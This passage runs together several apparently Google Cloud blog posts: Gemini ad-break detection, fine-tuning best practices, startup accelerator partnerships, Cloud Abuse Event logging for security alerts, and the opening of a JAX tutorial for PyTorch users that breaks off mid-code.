Narrative type: Scene transition
Prior scene summary: A character walking along a busy street.
This enriched metadata allows for the precise matching of the right ad to the right user at the right time. For example, the first ad break (Daytime to Evening Dinner), with its associated sentiment of “cheerful and relaxed,” might be ideal for advertisements that resonate with those feelings such as travel, entertainment or leisure products, rather than just a product like cookware. By understanding not just the basic context, but also the emotional tone of a scene, Gemini facilitates a new level of contextual advertising that is far more engaging for the viewer.
Google Cloud, powered by the Gemini 1.5 Pro model, delivers a robust and scalable solution for intelligent ad break detection. Its multimodal analysis capabilities simultaneously process video, audio, and text to detect even subtle transitions, enabling seamless ad integration. Gemini’s ability to process up to 2 million tokens ensures comprehensive analysis of long videos across diverse genres with minimal retraining, offering versatility for media providers. This large context window allows the model to analyze approximately 2 hours of video and audio content in a single pass, which significantly reduces processing time and complexity compared to methods that require breaking videos into smaller chunks.
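As a rough illustration of this approach, the sketch below asks Gemini 1.5 Pro on Vertex AI to return ad-break candidates as JSON; the project ID, bucket path, and prompt wording are placeholders, and the requested fields mirror the metadata examples shown earlier:
import vertexai
from vertexai.generative_models import GenerativeModel, Part

vertexai.init(project="your-project-id", location="us-central1")  # placeholder project

model = GenerativeModel("gemini-1.5-pro-002")

# Prompt wording is illustrative; tune it for your content and taxonomy.
prompt = """Analyze this video and identify natural ad break points.
Return JSON: a list of objects with fields timestamp, transition_feeling,
transition_type, narrative_type, and prior_scene_summary."""

# Video is read directly from Cloud Storage; path is a placeholder.
video = Part.from_uri("gs://your-bucket/your-video.mp4", mime_type="video/mp4")

response = model.generate_content([video, prompt])
print(response.text)  # JSON with scene-change timestamps and contextual metadata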
The architecture ensures high performance and reliability through these key stages:
Image 2 – Architecture diagram for scene change detection
1. Video Ingestion and Storage (GCS): Videos are ingested and stored in Google Cloud Storage (GCS), a highly scalable and durable object storage service offering various storage classes to optimize cost and performance. GCS ensures high availability and accessibility for processing. Robust security measures, including Identity and Access Management (IAM) roles and fine-grained access controls, are in place.
2. Orchestration and simultaneous processing (Vertex AI pipelines & Gemini): Vertex AI pipelines orchestrate the end-to-end video analysis process, ensuring seamless execution of each stage. Vertex AI manages simultaneous processing of multiple videos using Google Gemini’s multimodal analysis, significantly accelerating the workflow while maintaining scalability. This includes built-in safety filters powered by Gemini, which perform a nuanced contextual analysis of video, audio, and text to discern potentially inappropriate content. The results are returned in JSON format, detailing scene change timestamps, video metadata, and contextual insights.
Post-processing is then applied to the JSON output to structure the data in a tabular format, ensuring compatibility with downstream storage and analysis tools (a short sketch follows this list). This includes:
Standardizing timestamps: Ensuring uniform time formats for consistent querying and integration.
Metadata mapping: Beyond basic metadata extraction, this stage includes the classification of scenes (or entire video programs) into industry standard taxonomies, such as the IAB’s, or the customer’s own custom taxonomies. This allows for more granular organization of video content based on their type and provides an easier method of ad targeting.
Error handling and data validation: Filtering out incomplete or invalid entries to maintain data quality.
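A minimal Python sketch of this post-processing step, assuming the JSON fields shown in the earlier examples (the field names are illustrative):
import json

def normalize_timestamp(ts: str) -> str:
    """Standardize 'MM:SS' or 'HH:MM:SS' strings to HH:MM:SS."""
    parts = [int(p) for p in ts.split(":")]
    while len(parts) < 3:
        parts.insert(0, 0)
    h, m, s = parts
    return f"{h:02d}:{m:02d}:{s:02d}"

def to_rows(gemini_json: str, video_id: str):
    """Flatten Gemini's JSON scene output into tabular rows, dropping invalid entries."""
    rows = []
    for scene in json.loads(gemini_json):
        if "timestamp" not in scene:  # basic validation: skip incomplete entries
            continue
        rows.append({
            "video_id": video_id,
            "timestamp": normalize_timestamp(scene["timestamp"]),
            "transition_type": scene.get("transition_type", "unknown"),
            "transition_feeling": scene.get("transition_feeling", "unknown"),
            # Taxonomy mapping, e.g. to IAB categories, per the step above.
            "iab_category": scene.get("iab_category", "unclassified"),
        })
    return rows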
3. Structured data storage and enrichment (BigQuery): The structured data resulting from Gemini’s scene change detection analysis, including timestamps, metadata, and contextual insights, is stored in BigQuery. BigQuery ML can leverage this integrated data to build predictive models for ad placement optimization. For example, you can schedule a 15-second action-themed ad during a scene change in an action sequence, targeting viewers who frequently watch action movies in the evening.
4. Monitoring and logging (GCP operations suite): GCP Operations Suite provides comprehensive monitoring and alerting for the entire pipeline, including real-time visibility into job progress and system health. This includes detailed logging, automated alerts for failures, and dashboards for key performance indicators. This proactive approach ensures timely issue resolution and maximizes system reliability.
Foundation models such as Gemini have revolutionized how we work, but sometimes they need guidance to excel at specific business tasks. Perhaps their answers are too long, or their summaries miss the mark. That’s where supervised fine-tuning (SFT) comes in. When done right, it unlocks incredible precision to tailor Gemini for specialized tasks, domains, and stylistic nuances.
In an earlier blog, we covered when to embrace SFT and how it compares to other methods for optimizing your model’s output. In this blog, we’ll go deeper into how developers can streamline their SFT process, including:
Selecting the optimal model version
Crafting a high quality dataset
Best practices to evaluate the models, including tools to diagnose and overcome problems.
1. Establish a baseline and select your model
First, evaluate your foundation model on a representative dataset before fine-tuning to quantify improvements. This helps you understand its initial capabilities and identify areas for targeted improvement. Here are three key things to analyze (a short evaluation sketch follows this list):
Initial performance: Assess how the model performs without any training (zero-shot) and potentially with a few examples (few-shot).
Metrics: Select evaluation metrics aligned with your specific task, like exact match, BLEU or ROUGE.
Data: Ensure your evaluation dataset is diverse and representative of the real-world data the model will encounter.
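A minimal sketch of a zero-shot baseline pass scored with a normalized exact-match metric (the normalization rules and sample data are illustrative; substitute your own model outputs and a task-appropriate metric):
def normalize(text: str) -> str:
    """Lowercase and strip whitespace/trailing punctuation so formatting doesn't mask matches."""
    return " ".join(text.lower().strip().rstrip(".!?").split())

def exact_match(predictions, references) -> float:
    """Fraction of predictions that match the reference after normalization."""
    hits = sum(normalize(p) == normalize(r) for p, r in zip(predictions, references))
    return hits / len(references)

# Illustrative zero-shot outputs vs. gold labels.
predictions = ["The capital of France is Paris.", "42"]
references = ["the capital of france is paris", "41"]
print(f"baseline exact match: {exact_match(predictions, references):.2f}")  # 0.50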
Analyzing these baseline results, especially where the model struggles, is crucial for defining an effective fine-tuning strategy. When fine-tuning Gemini, you have a couple models to choose from:
Gemini 1.5 Pro: Google’s best model for general performance.
Gemini 1.5 Flash: Google’s model designed for cost-performance and low latency.
Choosing the right model involves two key considerations:
Align the model with your use case: Before using SFT, start with the model that most easily achieves your desired functionality. If your application requires high accuracy and complex reasoning, begin with Gemini Pro. If this works, you can then consider cost; for example, you could try SFT on Flash to get better latency and cheaper inference.
Efficiently improving the model with your data: Before fine-tuning a larger model like Gemini Pro, it’s often beneficial to test your tuning data on a smaller, less expensive model like Gemini Flash first. This allows you to verify that your data actually improves the model’s performance. If the performance is not good enough, you can always switch to a larger model. If your tuning data effectively improves the smaller model’s accuracy, that indicates your data is of good quality, and there is a good chance that tuning the larger model with this data will be effective, too.
Consider your data
SFT isn’t just about throwing labeled data at a model; it’s a nuanced process where the right choices are crucial. To adapt a foundation model for specific tasks, we fine-tune it with a labeled dataset. This dataset contains inputs (like an earnings report) and their desired outputs (like a summary).
Machine learning thrives on data. The success of your supervised fine-tuning depends significantly on the quality of your tuning data. Here are some essential guidelines to follow.
Quality vs quantity
Quality vs. quantity in your training data is crucial. Vertex AI leverages Low-Rank Adaptation (LoRA) for efficient fine-tuning, freezing the original model weights and injecting trainable matrices to adjust model behavior effectively with a small number of trainable parameters. This means faster fine-tuning, fewer resources, and less reliance on massive datasets.
Focus on high-quality examples that are:
Relevant: Closely aligned with your specific fine-tuning task.
Diverse: Covering a wide range of potential inputs and scenarios.
Accurate: Featuring correct labels and outputs.
While more data can improve a model, it often requires fewer training epochs, and at some point you hit diminishing returns; it is not worth tuning on the same cluster of examples over and over again. A smaller, refined, and representative dataset often outperforms a large, noisy one. Small datasets carry a risk of overfitting, so you may want to control the number of epochs. You can start with around 100 examples to validate the effectiveness of tuning, then scale up to cover more corner cases or categories.
Data pre-processing
Pre-processing is a critical step in preparing data for supervised fine-tuning of large language models (LLMs). Research has shown that one of the most crucial pre-processing steps is deduplication, which involves identifying and removing duplicate data points. Duplicate examples in training data can lead to several issues: memorization, which hinders generalization, and inefficient training, as the model redundantly learns from similar clusters. Duplicate or near-duplicate examples shared between training and validation/test sets cause data leakage, artificially inflating performance.
For deduplication, leverage techniques like exact and fuzzy matching, and clustering. Tools like ExactSubstr deduplication can efficiently handle larger datasets. Furthermore, explore data augmentation to enhance data diversity and model robustness.
Be aware that pre-processing can also help when evaluating the performance of your fine-tuned model. For example, you might want to normalize letter casing, remove extra whitespace, and standardize punctuation.
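A minimal Python sketch of exact deduplication over a JSONL dataset, combining the normalization steps above with content hashing (fuzzy matching and clustering would build on this; the "text" field name is an assumption):
import hashlib
import json

def normalize(text: str) -> str:
    """Case-fold, collapse whitespace, and strip trailing punctuation before hashing."""
    return " ".join(text.lower().split()).rstrip(".!?")

def dedupe_jsonl(in_path: str, out_path: str, key: str = "text") -> int:
    """Drop examples whose normalized content hash has been seen before."""
    seen = set()
    kept = 0
    with open(in_path) as fin, open(out_path, "w") as fout:
        for line in fin:
            example = json.loads(line)
            digest = hashlib.sha256(normalize(example[key]).encode()).hexdigest()
            if digest in seen:
                continue  # exact duplicate after normalization
            seen.add(digest)
            fout.write(line)
            kept += 1
    return kept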
2. Add instructions to your dataset
Including instructions in your fine-tuning dataset helps boost performance. The model learns to condition its output on the given instructions, improving its ability to perform the desired task and generalize to similar, unseen instructions, while reducing the need for lengthy and complex prompts during inference. There are two primary methods: system instructions and instance-level text prompts; both are optional but can improve performance.
System instructions provide global directives, shaping the overall response style. For example, "Answer in JSON format" enforces structured outputs, while "You are an expert in bioinformatics" sets the response domain.
Instance-level instructions offer example-specific guidance embedded within the model input. For instance, "Summarize the following research paper, focusing on the methodology and key findings:" directs the model to extract specific information.
Experimenting with different instruction styles, informed by resources like the Gemini prompting strategies, is important. You can experiment by prompting the Gemini model before adding the instruction to the dataset. Adding few-shot examples to your dataset will not give additional benefit. Crucially, ensure the prompts and instructions used in your fine-tuning dataset closely resemble those you plan to use in production. This alignment is vital for optimal performance.
Training-serving skew
A critical factor influencing fine-tuning effectiveness is the alignment between your tuning data and production data. Divergence in aspects like format, context, or example distribution can significantly degrade model performance. For instance, if your tuning data consists of formal language examples and your production data includes informal social media text, the model may struggle with sentiment analysis. To prevent this, carefully analyze your training and production data. Techniques like data augmentation and domain adaptation can further bridge the gap and enhance the model’s generalization capabilities in production.
Focus on complex examples
When fine-tuning, it’s tempting to throw all your data at the model and hope for the best. However, a more strategic approach focuses on examples that the base model finds difficult.
Instead, identify the specific areas where the model struggles. By curating a dataset of these challenging examples, you can achieve more significant improvements with less data. This targeted approach not only boosts performance but also makes your fine-tuning process more efficient. During the benchmarking process, analyze the model’s performance on a diverse dataset. Identify examples where the model struggles with specific tasks, formats, or reasoning abilities. Then add these examples to your training dataset; you may also want to find additional, similar examples for your evaluation dataset to prevent leakage.
The importance of a validation dataset
Always incorporate a well-structured validation dataset into your fine-tuning process. This separate set of labeled data serves as an independent benchmark to evaluate your model’s performance during training, helping you identify overfitting, choose the epoch at which to stop training, and ensure the model generalizes well to unseen data. The validation dataset should be representative of the real-world data that will be used during inference.
Data formatting
In supervised fine-tuning, the model learns from a labeled dataset of input-output pairs. To use SFT for Gemini, your data needs to be in a specific format in a JSONL file. Adding instructions to your dataset helps guide the model during the fine-tuning process. You can add a systemInstruction and additional instructions to the contents fields, each containing role and parts to represent the conversation flow and content. You do this for each of the lines (samples) in your JSONL file. For instance, a systemInstruction might specify the persona of the LLM, while the contents would include the user query and the desired model response. A well-structured dataset in the correct format is crucial for effective knowledge transfer and performance improvement during fine-tuning. Here’s an example (datapoint) of the required format for your dataset:
{
  "systemInstruction": {
    "role": "system",
    "parts": [
      { "text": "You are a helpful and harmless AI assistant." }
    ]
  },
  "contents": [
    { "role": "user", "parts": [ { "text": "What is the capital of France?" } ] },
    { "role": "model", "parts": [ { "text": "The capital of France is Paris." } ] }
  ]
}
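A small Python sketch for generating such a JSONL file from input/output pairs, following the field names in the example above:
import json

def write_sft_dataset(pairs, out_path, system_text="You are a helpful and harmless AI assistant."):
    """Write (user_input, desired_output) pairs as one JSON record per line."""
    with open(out_path, "w") as f:
        for user_input, desired_output in pairs:
            record = {
                "systemInstruction": {"role": "system", "parts": [{"text": system_text}]},
                "contents": [
                    {"role": "user", "parts": [{"text": user_input}]},
                    {"role": "model", "parts": [{"text": desired_output}]},
                ],
            }
            f.write(json.dumps(record) + "\n")

# Illustrative usage with the datapoint from the example above.
write_sft_dataset(
    [("What is the capital of France?", "The capital of France is Paris.")],
    "train.jsonl",
)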
3. Hyperparameters and performance
When you start with fine-tuning, it’s important to choose the right hyperparameters. Hyperparameters are the external configuration settings that govern the training process of a large language model and ultimately determine the model’s performance on a given task. When fine-tuning Gemini, you can follow the guidance below to set the hyperparameters (epochs, learning rate multiplier, and adapter size):
Gemini 1.5 Pro
Text fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = 20, learning rate multiplier = 10, adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = 10, learning rate multiplier = default or 5, adapter size = 4.
Image fine-tuning: with a dataset size of ~1000 examples, start with epochs = 15, learning rate multiplier = 5, and adapter size = 4. Increase the number of epochs when you have <1000 samples and decrease it when you have >1000 examples.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Gemini 1.5 Flash
Text fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs = default, learning rate multiplier = 10, and adapter size = 4. With a dataset size >= 1000 examples or average context length >= 500, we recommend epochs = default, learning rate multiplier = default, and adapter size = 8.
Image fine-tuning: with a dataset size of <1000 examples and average context length <500, we recommend setting epochs >= 15 (increase when you have fewer examples), learning rate multiplier = 5, and adapter size = 16. With a dataset size >= 1000 examples or average context length >= 500, we recommend setting epochs <= 15 (decrease when you have more examples), learning rate multiplier = default, and adapter size = 4.
Audio fine-tuning: we recommend setting epochs = 20, learning rate = 1 and adapter size = 4.
Audio use cases like Automated Speech Recognition (ASR) might need a higher epochs setting to reach optimal results. Start with the settings mentioned above; based on your evaluation metrics, you can increase the number of epochs.
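As a sketch of how these hyperparameters map onto an actual tuning job, the following uses the Vertex AI SDK's supervised tuning entry point; the project, bucket paths, and display name are placeholders, and parameter availability should be checked against your SDK version:
import vertexai
from vertexai.tuning import sft

vertexai.init(project="your-project-id", location="us-central1")  # placeholders

# Gemini 1.5 Flash, small text dataset (<1000 examples): per the guidance
# above, keep epochs at the default and raise the learning rate multiplier.
tuning_job = sft.train(
    source_model="gemini-1.5-flash-002",
    train_dataset="gs://your-bucket/train.jsonl",             # placeholder path
    validation_dataset="gs://your-bucket/validation.jsonl",   # placeholder path
    learning_rate_multiplier=10,
    adapter_size=4,
    tuned_model_display_name="my-tuned-flash",                # placeholder name
)
print(tuning_job.resource_name)  # track progress in the console or TensorBoard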
After your initial run, iterate by adjusting the hyperparameters and closely monitoring key training and evaluation metrics. Two primary metrics to monitor during fine-tuning are:
Total loss measures the difference between predicted and actual values. A decreasing training loss indicates the model is learning. Critically, observe the validation loss as well. A significantly higher validation loss than training loss suggests overfitting.
Fraction of correct next step predictions measures the model’s accuracy in predicting the next item in a sequence. This metric should increase over time, reflecting the model’s growing accuracy in sequential prediction.
Monitor these metrics for both your training and validation datasets to ensure optimal performance. Depending on the task, consider other relevant metrics as well. To monitor your fine-tuning job, use the Google Cloud Console or TensorBoard.
Remember: these are just starting points. Experimentation is key to finding the optimal hyperparameters for your specific fine-tuning task. You might also want to follow some of the troubleshooting steps below based on the performance of your fine-tuning experiment.
Suboptimal performance
How to spot this: Training loss and validation loss decrease as training progresses, but the validation loss does not converge or reach a minimum.
Possible causes: The training dataset may be too small or lack sufficient diversity to represent the real-world scenarios the model will encounter.
How to alleviate: Increase the number of epochs or the learning rate multiplier to speed up training. If that doesn’t work, gather more data.
Overfitting
How to spot this: During training, the training loss decreases consistently, but the validation loss decreases initially and then starts to increase. This divergence indicates that the model is learning the training data too well and is failing to generalize to new data.
Cause: The model has too much capacity (e.g., too many layers or parameters) relative to the size and complexity of the training data.
How to alleviate: Decrease the number of epochs to the point where validation loss reaches its minimum, or increase the effective size and diversity of the training data.
Potential data issues
How to spot this: A very high initial training loss (>10) indicates that the model’s predictions are very far from the labels.
Cause: There could be issues with your training dataset. One typical example is that the input length exceeds the maximum context length, which leads to truncation.
How to alleviate: Double check your training dataset to make sure it follows the best practice from the previous section.
Evaluate your model
Evaluating the performance of a fine-tuned language model is crucial for understanding its quality, selecting checkpoints, and optimizing hyperparameters. Evaluation can be challenging for generative models, as their outputs are often open-ended and creative. To gain a holistic understanding of performance, it’s best to combine different evaluation approaches, primarily a blend of auto-metrics and model-based evaluation, potentially calibrated with human evaluation.
Auto-metrics: These metrics provide quantitative measures by comparing the model’s output to a ground truth. While they may not capture nuanced aspects like factuality, they remain valuable due to their:
Speed: Auto-metrics are computationally inexpensive and fast to calculate.
Objectivity: They offer consistent, objective measurements, enabling reliable progress tracking and model comparisons.
Interpretability: Metrics like accuracy, F1 score, or BLEU are widely understood and provide readily interpretable results.
It’s crucial to select appropriate auto-metrics based on the task. For instance:
BLEU Score (translation and summarization): Measures n-gram overlap between generated and reference text, focusing on precision.
ROUGE (summarization): Evaluates n-gram overlap with an emphasis on recall.
Model-based metrics: These methods leverage a language model as a judge (an autorater) to assess the quality of generated output based on predefined criteria, aligning more closely with the task evaluation rubrics. For example, you might use model-based evaluation to assess the factual accuracy or logical consistency of a response.
Human Evaluation: While human judgment remains the gold standard, its cost and scalability limitations make it less practical for continuous evaluation during fine-tuning. Instead, we can strategically use human evaluation to calibrate model-based evaluators (autoraters). This involves collecting a smaller but high-quality dataset of human judgments and training the autorater to mimic these judgments. We can then rely on the autorater during the tuning process and conduct a final round of validation with human raters to ensure the chosen checkpoint meets the desired quality standards.
What’s next?
Ready to get started? Dive into our Generative AI repository and explore notebooks like our guide on how to use supervised fine-tuning. Experience the transformative potential of SFT on Vertex AI, and tailor your AI applications for peak performance and customization.
Want to fine-tune a Gemini model? Head over to the Vertex AI documentation to see which ones you can customize.
If you want to learn more about Generative AI and fine-tuning, please have a look at our 5-Day Gen AI Intensive Course.
A special thanks to May Hu, Yanhan Hou, Xi Xiong, Sahar Harati, Emily Xue and Mikhail Chrestkha from Google Cloud for their contributions.
At Google Cloud, we focus on building the most competitive and powerful network of support for startups. One of the ways we show our support is by partnering with investors, accelerators, and incubators to deliver the resources and benefits that help startups succeed.
For example, we are proud to partner with marquee institutions who invest in the next generation of founders like Y Combinator. We have also extended our network of partnerships to accelerators worldwide who support founders with mentorship, education, and in some cases, investment, such as ERA and AI2 Incubator.
In 2024, we worked with over 300 accelerators worldwide to help thousands of startups and over 3,000 founders build with Google. We’ve extended benefits to these startups including access to Startup Success Managers, Customer Engineers, and AI product teams, dedicated packages of credits, and technical programming like workshops and office hours.
Today, we’re proud to announce our latest partnerships with three more accelerators – Berkeley SkyDeck, Upekkha, and UnternehmerTUM – and highlight some of the companies we’re supporting through them.
Introducing our latest accelerator partnerships
Berkeley SkyDeck is the only university accelerator partnering with a leading venture capital fund. Berkeley’s mission emphasizes long-term societal benefit, and SkyDeck prioritizes companies that align with this vision. Several SkyDeck companies are already running on Google Cloud, including:
Deeli AI, an AI-powered platform that helps companies discover and evaluate emerging technologies to make informed investment decisions. They currently build their product and data pipeline on various services such as GCE, Cloud Run, and Dataflow, and interact with models from the Vertex AI Model Garden.
ContextQA is agentic AI for software testing, delivering 12x the value by enabling accurate, user-centric test automation from day zero of development and helping teams ship bug-free products 40% faster. ContextQA uses Gemini models to continuously compare actual application behavior with expected behavior, adapting automatically to new changes for immediate agility.
T-Robotics provides pre-trained AI skills for robots that make commercial robots intelligent and robust. These skills are programmed through a conversational robot agent that leverages visual, haptic, action and language models – including Google Cloud’s Gemini – to seamlessly interpret and adapt to diverse industrial environments.
“Our partnership with Google Cloud enables startups to build better and faster, which is crucial for their success. Beyond the technology and services provided, we foster meaningful connections between our startups and Googlers, facilitating discussions on industry trends and innovations in AI.” – Taylor Marcus, Head of Business Development at Berkeley SkyDeck
Upekkha helps Indian founders build vertical AI companies that sell globally, with intense coaching, a network of founders, and capital. Google Cloud is partnering with them to support:
Outpost is a platform for AI/ML and data teams to train, fine-tune, and deploy gen AI models with managed infrastructure, tools, and workflows.
Labellerr’s data labeling engine combines automated annotation and smart QA, using its Vertex AI integration and Cloud Run to process millions of images and thousands of hours of video in just a few weeks, work that previously took ML teams months.
Bynry’s SMART360 leverages Google Cloud’s robust infrastructure to empower small and mid-sized utilities to enhance operational efficiency and customer satisfaction.
“Google Cloud has technology that just works. You can tell they actually listen to developers. They don’t just give out credits; they help founders understand how to use their technology.” – Thiyagarajan Maruthavanan (Rajan) – Managing Partner, Upekkha
UnternehmerTUM is the leading center for innovation and business creation in Europe, supporting more than 50 high-growth technology startups every year and offering complete service from initial idea to IPO. Startups supported by them include:
Kraftblock’s innovative technology offers unparalleled large-scale, long-duration energy storage, empowering industries to transition towards sustainable thermal processes. The green tech company is using Google’s Compute Engine to power their simulations.
tulanā’s highly customizable platform uses forecasting, optimization, simulation, and AI to help enterprise clients make better decisions across their supply chains. tulanā uses Cloud Run to horizontally scale its optimization workloads, Google’s Gemini model for intelligent ETL processes, and Cloud SQL and BigQuery to store customer data.
SE3 Labs specializes in 3D computer vision and AI. They develop advanced technologies to create “Spatial GPTs,” which are essentially AI models that can understand and interact with the world in 3D. The startup loves using Google Cloud Run for their deployment.
“We chose to partner with Google Cloud because their innovation-driven approach aligns closely with our mission to empower high-tech startups. Google Cloud’s advanced infrastructure, AI, and data analytics capabilities offer exceptional tools that support our founders in building robust, scalable solutions, from market entry to growth.” – Barbara Mehner, Managing Partner at XPRENEURS by UnternehmerTUM
Building on a history of support with accelerators
These new partnerships expand on our existing work with accelerators to help bring leading cloud, AI models, and AI-optimized infrastructure to the companies they support. These include:
500 Global is a multi-stage venture capital firm. Its investments and flagship accelerator help founders with access to a supportive global network of those who’ve successfully built startups before. Notable alumni include Intercom, Talkdesk, Innovaccer, Babylist and Solana.
Techstars provides individualized care with its small cohort size and mentor-driven approach across more than 30 cities worldwide.
Antler is a global early-stage VC that operates in 30 cities across major entrepreneurial hubs, with a proven process to back founders from pre-seed to Series C. Their flagship Residency Program empowers founders to find the right co-founders, validate and build ideas rapidly, and secure funding to launch and scale impactful ventures.
StartX is the non-profit startup community, accelerator, and fellowship program for over 2,500 Stanford University founders, offering support without requiring equity.
Plug and Play operates over 100 accelerator programs globally, accelerating more than 2,500 startups annually. Its portfolio includes over 30 unicorns and a network of 90,000 startups worldwide. They offer mentorship and access to a vast network of investors and industry leaders.
Gener8tor offers 75 programs globally, each providing a highly selective, concierge-level experience for the startups that are selected.
MassChallenge stands out as an impact-focused, zero-equity accelerator, which allows startups to receive world-class support without giving up any ownership.
IIT Madras Incubation Cell is deeply integrated with India’s top engineering institute and provides a unique ecosystem that nurtures R&D-driven, deep-tech startups.
nasscom GenAI Foundry offers Indian GenAI startups access to GPU resources, fundraising, paid pilot and showcase opportunities, and enablement on go-to-market, technology, Responsible AI, and intellectual property, through a network of 3,500+ industry members and subject matter experts.
Lanzadera is a prominent accelerator in Spain, unique in its adoption of a management model that drove its founder’s success in business, and its close collaboration with the business school EDEM and investment fund Angels, creating a flywheel of innovation.
We’re excited about all of the opportunities that will come from these new partnerships, as well as the increasing value of relationships we have with other accelerators. All of these programs and strategies illustrate our ever-expanding commitment to founders and startups that stand on the front lines of innovation.
Learn more
Companies that work with these accelerators should reach out to their accelerator Program Manager to learn more about getting started with Google Cloud.
At Google Cloud, we are deeply committed to partnering with our customers to help achieve stronger security outcomes.
As a part of this commitment, we’re excited to announce that Google Cloud customers can now track Cloud Abuse Events using Cloud Logging. These events can include leaked service account keys, crypto mining incidents, and malware.
When we identify one of these abuse issues that’s affecting your cloud resources, you’ll now receive two detailed notifications: one in a structured log format, and an email notification.
Cloud Abuse Event Logging is focused on providing a more efficient and effective method for customers to receive important abuse and security notifications. Previously, notifications were sent to customers only in an email, which at times created challenges around consistency, automation, and continuity.
In response to customer feedback, we developed Cloud Abuse Event Logging to help supplement email notifications. By consuming these log notifications, customers can develop consistent automated processes to resolve abuse and security issues more efficiently and effectively. Here are a few benefits:
Direct access in Cloud Logging: These notifications are readily available as logs in Cloud Logging, making them easier to find and manage.
Enhanced automation: The structured log format allows you to integrate these notifications into your existing security monitoring and incident response systems, which can help reduce the time it takes to address potential threats.
Historical trend analysis: Gain insights into past abuse events to identify patterns and proactively strengthen your security measures.
Dashboard built on top of Cloud Abuse Event logs using Cloud Logging.
A Cloud Abuse Event log in Logs Explorer for CRYPTO_MINING.
This new logging system reinforces our commitment to our customers, aligns with our shared fate model, and makes Google Cloud more secure. Cloud Abuse Events are provided on a best-effort basis to assist you in identifying potential abuse and we encourage you to combine these notifications with your own security practices for comprehensive protection.
Monitoring and dashboarding
This new integration of Cloud Abuse Events with Cloud Logging helps you strengthen your security with automated and timely notifications. You can use Cloud Monitoring to observe trends in your logs and to notify you when specific conditions are met, such as receiving important types of abuse events. For example, based on the logs provided via Cloud Abuse Events, you can configure an alerting policy to notify you whenever we’ve become aware that your service account key has been leaked to the public.
You can also set up custom dashboards for your logs to get insights into the overall health and security of your environment. Cloud Abuse Events in Cloud Logging gives you many flexible options to effectively manage your security and monitoring. For example, if you’d like to aggregate the logs from each project in one place, an aggregate sink at the organization level may be useful. Additionally, you can use Log Analytics to run queries that analyze your log data, which allows you to easily chart and query results and can help uncover patterns and trends in your logs.
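As an illustration, a Log Analytics query along these lines could chart abuse events by category. The view path and payload field names here are assumptions; check the Cloud Abuse Event payload documentation for the exact schema.

```sql
-- Hypothetical sketch: count abuse events by category in Log Analytics
SELECT
  JSON_VALUE(json_payload.detectionCategory) AS category,
  COUNT(*) AS events
FROM `PROJECT_ID.global._Default._AllLogs`
WHERE log_name LIKE '%abuseevent%'
GROUP BY category
ORDER BY events DESC
```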
Automate response to abuse events
There are several ways to detect and respond to Cloud Logging events in real time. For example, if you would like to configure automated deprovisioning of a VM after crypto mining has been detected on the instance, you can follow these steps:
Create a Logging sink to direct crypto mining related Abuse Events to your business logic. You can use the following filters to isolate these logs:
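For example, a filter along these lines isolates crypto mining events. The log ID and field name shown are illustrative; consult the Cloud Abuse Event documentation for the exact values.

```
logName:"abuseevent.googleapis.com"
jsonPayload.detectionCategory="CRYPTO_MINING"
```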
Create a Pub/Sub topic. The Logging sink routes the filtered Abuse Events to this topic, and each Pub/Sub message then triggers your Cloud Functions business logic asynchronously.
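A minimal sketch of these two steps with gcloud, using placeholder resource names and the illustrative filter from above:

```
# Create the topic that will receive the filtered Abuse Events
gcloud pubsub topics create abuse-events

# Create the sink that routes matching logs to the topic
gcloud logging sinks create abuse-event-sink \
  pubsub.googleapis.com/projects/PROJECT_ID/topics/abuse-events \
  --log-filter='logName:"abuseevent.googleapis.com" AND jsonPayload.detectionCategory="CRYPTO_MINING"'
```

After creating the sink, grant its writer identity the Pub/Sub Publisher role on the topic so the routed logs can be delivered.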
You can ingest Cloud Abuse Event logs into Google Security Operations which lets you store, search, and examine aggregated security information for your enterprise. If you prefer to export your abuse logs to an external security information and event management system (SIEM) for further analysis or custom automation, you’ll need to route your logs to a supported destination, such as a Google Cloud Storage bucket or a Pub/Sub topic that can provide support for third-party integrations.
You can learn more about responding to abuse notifications and warnings by visiting our documentation. For technical information about our Cloud Abuse Event log payload format, please click here.
Like many PyTorch users, you may have heard great things about JAX — its high performance, the elegance of its functional programming approach, and its powerful, built-in support for parallel computation. However, you may have also struggled to find what you need to get started: a straightforward, easy-to-follow tutorial to help you understand the basics of JAX by connecting its new concepts to the PyTorch building blocks that you’re already familiar with. So, we created one!
In this tutorial, we explore the basics of the JAX ecosystem from the lens of a PyTorch user, focusing on training a simple neural network in both frameworks for the classic machine learning (ML) task of predicting which passengers survived the Titanic disaster. Along the way, we introduce JAX by demonstrating how many things — from model definitions and instantiation to training — map to their PyTorch equivalents.
As a PyTorch user, you might initially find JAX’s highly modularized ecosystem to be quite different from what you are used to. JAX focuses on being a high-performance numerical computation library with support for automatic differentiation. Unlike PyTorch, it does not try to have explicit built-in support for defining neural networks, optimizers, and so on. Instead, JAX is designed to be flexible, allowing you to bring in your frameworks of choice to add to its functionality.
In this tutorial, we use the Flax Neural Network library and the Optax optimization library — both very popular, well-supported libraries. We show how to train a neural network in the new Flax NNX API for a very PyTorch-esque experience, and then show how to do the same thing with the older, but still widely-used Linen API.
Functional programming
Before we dive into our tutorial, let’s talk about JAX’s rationale for using functional programming, as opposed to the object-oriented programming that PyTorch and other frameworks use. Briefly, functional programming focuses on pure functions that cannot mutate state and cannot have side effects, i.e., they always produce the same output for the same input. In JAX, this manifests through significant usage of composable functions and immutable arrays.
The predictability of pure functions and functional programming unlocks many benefits in JAX, such as Just-In-Time (JIT) compilation, where the XLA compiler can significantly optimize code on GPUs or TPUs, for major speed-ups. Moreover, they also make sharding and parallelizing operations much easier in JAX. You can learn more from the official JAX tutorials.
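For a taste of what this looks like in practice, here is a minimal sketch of a pure function compiled with jax.jit (the function and names are illustrative):

```python
import jax
import jax.numpy as jnp

@jax.jit
def scaled_sum(x, w):
    # A pure function: the output depends only on the inputs,
    # and no state is mutated
    return jnp.sum(x * w)

x = jnp.arange(4.0)
print(scaled_sum(x, 2.0))  # traced and compiled by XLA on first call
```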
Do not be deterred if you’re new to functional programming — as you will soon see, Flax NNX hides much of it behind standard Pythonic idioms.
Data loading
Data loading in JAX is very straightforward — just do what you already do in PyTorch. You can use a PyTorch dataset/dataloader with a simple collate_fn to convert things to the Numpy-like arrays that underlie all JAX computation.
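For instance, a minimal collate_fn might look like this; the dataset name and (features, label) batch structure are illustrative:

```python
import numpy as np
from torch.utils.data import DataLoader

def numpy_collate(batch):
    # Stack a list of (features, label) pairs into NumPy arrays,
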